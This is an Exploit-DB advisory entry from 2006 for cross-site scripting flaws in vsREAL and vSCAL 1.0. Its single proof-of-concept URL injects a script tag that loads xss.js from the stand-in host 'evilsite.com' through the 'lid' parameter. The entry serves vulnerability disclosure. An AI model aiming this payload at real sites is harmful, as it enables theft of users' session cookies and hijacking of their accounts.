Baby Katie Media VSReal and VScal 1.0 - 'index.php?lid' Cross-Site Scripting

EDB-ID:

27999


Author:

Luny

Type:

webapps


Platform:

PHP

Date:

2006-06-09


source: https://www.securityfocus.com/bid/18350/info

vsREAL and vSCAL are prone to multiple cross-site scripting vulnerabilities. These issues are due to the applications' failure to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>